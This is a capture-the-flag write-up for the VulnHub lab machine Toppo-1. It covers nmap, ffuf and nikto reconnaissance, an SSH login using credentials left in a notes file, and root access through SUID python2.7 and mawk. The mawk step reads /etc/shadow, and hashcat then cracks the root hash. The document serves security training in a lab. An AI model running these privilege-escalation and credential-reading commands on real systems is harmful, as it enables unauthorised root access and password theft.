Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# Nmap 7.92 scan initiated Sat Jan 29 00:48:25 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Toppo-1/192.168.110.6/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Toppo-1/192.168.110.6/scans/xml/_full_tcp_nmap.xml 192.168.110.6
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
adjust_timeouts2: packet supposedly had rtt of -529683 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -529683 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -176415 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -176415 microseconds. Ignoring time.
Nmap scan report for 192.168.110.6
Host is up, received arp-response (0.00080s latency).
Scanned at 2022-01-29 00:48:27 +08 for 19s
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAMXeIQqeVVpxMNAkY4RTRcy1D29rxJsEteFBLHjNfezXeIK+LmbYWt1lJXfXjwXo1dwe6BjA388IYcnKnFu7FPshuDGA/H/MNj2o0JaVoiS4e0VONX5NTENh/a+lScGKcbpvi5sxRhL110w8lrdZYK6taXKUbYnDAl1BpCHdb+DfAAAAFQCMbk+1pL8kAIa/FTuxO9IuWf6/lwAAAIAmyFHznKAwdtfCNLaSzFWL/LNzBcTPytb7RMvhcIMKAkS/2IfnPIHdQmni7IFpq4CaLMjiVHTBvZQCSIYulIrXcpoGxLuZ3tPR0NS89AySdoOT/7ngs5AKx3nSVJqdomRzQ8Pjxs1VxadVE645hUir2lidBD2vZRDO5Pw3yT1BfgAAAIAW5d6lONexLVvMCH7t6AtmCDA6+R+5Eq6WtdA/XZ4e/cAKU2sSnrgd35imo4Jp8fYJEVBdIBqhrjjW0Pr7TZeWg/4hgsS5ZunhQG1mNmpgud28VveZfZaoxwudeylbfCHg4InYeE2aUrAlTOIw/pKMyWpqRniNuA5QMHPPIO+GVg==
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDNiyFG4Uk84D3XUAN77szM4dkXvd6vOcyUKW3BARbCZFJQnGWqCBV6P0aR+Prs7Cx2+CVUeubbB2BFVQ6r4geCCNYV191XRdGPFFHlchAsfyhIJ1oLQYCAWxhWU6N2fYDcMwWVAlFHtgTXb5nmDFCz2dHHr9yUdzuOvXKHOgc4BFX8GP9dgmjkNPi8joLxowHuGiTcUlSsLU7sph9TrLV6j/TGqN3scrr1upMn6Vpv8/xA2zBYVU/jGVu/MyaaCEOL+WSXm58mKVBNnuPbBxatKRXUKebZDY7s+yLq0OPndwxxShfg7kHnaFF5Qbdan7a3UiR8RWHkpkbrVHuiwebx
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKMGp55PVlF8Zt+uCcJjrAwbxX1WX6i/CcFYGh8lQHmwJWaQq8SqLkdfdyvlOOj7VSOw6NA82BiLSAfGI0s95Ig=
| 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKG70nQU/kKxR0rcoe6hx38OEpmSQ08IHLqqkXQgSIfi
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
|_http-title: Clean Blog - Start Bootstrap Theme
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35146/udp6 status
| 100024 1 48791/tcp status
| 100024 1 51294/tcp6 status
|_ 100024 1 57711/udp status
48791/tcp open status syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:7C:34:70 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/29%OT=22%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61F
OS:41E6E%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8
OS:)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B
OS:4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120
OS:)ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=N)IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 0.004 days (since Sat Jan 29 00:43:11 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 192.168.110.6
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 29 00:48:46 2022 -- 1 IP address (1 host up) scanned in 21.64 seconds
TCP/80 (HTTP)
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root💀kali)-[~/vulnHub/Toppo-1]
└─# ffuf -u http://192.168.110.6/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php' -fw 22
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.6/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 22
________________________________________________
about.html [Status: 200, Size: 5030, Words: 1293, Lines: 130]
admin [Status: 301, Size: 314, Words: 20, Lines: 10]
contact.html [Status: 200, Size: 7016, Words: 1892, Lines: 170]
css [Status: 301, Size: 312, Words: 20, Lines: 10]
img [Status: 301, Size: 312, Words: 20, Lines: 10]
index.html [Status: 200, Size: 6437, Words: 2028, Lines: 184]
index.html [Status: 200, Size: 6437, Words: 2028, Lines: 184]
js [Status: 301, Size: 311, Words: 20, Lines: 10]
LICENSE [Status: 200, Size: 1093, Words: 156, Lines: 22]
mail [Status: 301, Size: 313, Words: 20, Lines: 10]
manual [Status: 301, Size: 315, Words: 20, Lines: 10]
post.html [Status: 200, Size: 8262, Words: 2059, Lines: 168]
vendor [Status: 301, Size: 315, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 363 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
adminmail
Nikto
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root💀kali)-[~/vulnHub/Toppo-1]
└─# nikto -ask=no -h http://192.168.110.6:80 2>&1 | tee "/root/vulnHub/Toppo-1/192.168.110.6/scans/tcp80/tcp_80_http_nikto.txt"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.110.6
+ Target Hostname: 192.168.110.6
+ Target Port: 80
+ Start Time: 2022-01-29 01:29:32 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 1925, size: 563f5cf714e80, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /package.json: Node.js package file found. It may contain sensitive information.
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2022-01-29 01:30:25 (GMT8) (53 seconds)
-------------------------------------------------------------------------
package.json
Initial Foothold
TCP/80 (HTTP) - Rabbit Hole
- View enumerated directories
admin![]()
notes.txt
notes.txt![]()
- ted?
- 12345ted123
package.json![]()
mail![]()
- Detect LFI vulnerability at
contact_me.php1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
┌───(root💀kali)-[~/vulnHub/Toppo-1] └─# ffuf -u http://192.168.110.6/mail/contact_me.php?W2:W1 -w /usr/share/wordlists/LFI/file_inclusion_linux.txt:W1 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt:W2 -fw 3 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://192.168.110.6/mail/contact_me.php?W2:W1 :: Wordlist : W1: /usr/share/wordlists/LFI/file_inclusion_linux.txt :: Wordlist : W2: /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response words: 3 ________________________________________________ :: Progress: [3103145/5820412] :: Job [1/1] :: 3972 req/sec :: Duration: [0:12:20] :: Errors: 0- Not susceptible to LFI
- At this point, I think TCP/80 is a rabbit hole
TCP/22 (SSH)
- SSH with ted:12345ted123
![]()
Privilege Escalation
Root - Via SUID Binary (GTFO BIN)
- Enumerate SUID Binaries
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
ted@Toppo:~$ find / -perm -4000 2>/dev/null /sbin/mount.nfs /usr/sbin/exim4 /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/python2.7 /usr/bin/chsh /usr/bin/at /usr/bin/mawk /usr/bin/chfn /usr/bin/procmail /usr/bin/passwd /bin/su /bin/umount /bin/mount
- Exploit
python2.7to spawn a root shell1
/usr/bin/python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'![]()
- Exploit
mawkto read root’s hash1 2 3
LFILE=/etc/shadow ted@Toppo:~$ /usr/bin/mawk '//' "$LFILE" | grep root | cut -d ":" -f2 $6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0
- Crack hash
1 2 3
┌──(root💀kali)-[~/vulnHub/Toppo-1] └─# hashcat -a 0 -m 1800 '$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0' /usr/share/wordlists/rockyou.txt --show $6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0:test123
- root:test123
- Root Flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
# cd /root # ls flag.txt # cat f cat: f: No such file or directory # cat flag.txt _________ | _ _ | |_/ | | \_|.--. _ .--. _ .--. .--. | | / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \ _| |_ | \__. | | \__/ | | \__/ || \__. | |_____| '.__.' | ;.__/ | ;.__/ '.__.' [__| [__| Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}
Comments powered by Disqus.